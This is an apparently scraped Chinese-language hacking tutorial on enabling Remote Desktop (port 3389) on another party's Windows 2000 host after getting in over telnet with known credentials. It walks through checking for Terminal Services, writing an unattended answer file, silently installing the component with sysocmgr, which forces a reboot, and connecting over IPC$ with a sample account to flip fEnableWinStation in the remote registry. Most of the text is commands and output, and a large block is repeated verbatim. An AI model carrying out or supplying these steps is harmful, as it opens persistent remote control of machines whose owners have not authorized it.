?? 利用telnet開放3389端口.txt
字號:
利用TELNET開放3389端口
[size=3]如果對方的端口有開放:
telnet 192.168.0.1
輸入用戶名/密碼
C:\>
\\成功進入!!!!
進入后,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.
這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.
好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄
2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄
2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完后自動重起.
如若加了/R參數主機就不會重起.
如果一切正常的話,幾分鐘后對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.
這里還有兩種方法
第一種開啟的辦法:
使用DameWare Mini Remote Control遠程連接上,
在"終端服務配置"里,重新啟用RDP連接,馬上就可以使用3389了.
第二種開啟的辦法:
修改遠程注冊表.
比如:
主機IP: 192.168.0.1
已有的帳號和密碼: wawa/7788
首先與遠程主機建立連接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打開本機注冊表
"開始"==>"運行"==>regedit
在"注冊表"下拉菜單中選擇"連接網絡注冊表"
在"計算機名"中輸入 \\192.168.0.1
這樣就進入了遠程主機注冊表.
現在我們找到這里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
將fEnableWinStation值由0改為1
-----------============------------============--------==========
SQLEXEC或telnet進入后,檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.
這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.
好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄
2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄
2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完后自動重起.
如若加了/R參數主機就不會重起.
如果一切正常的話,幾分鐘后對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了. [/size]
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -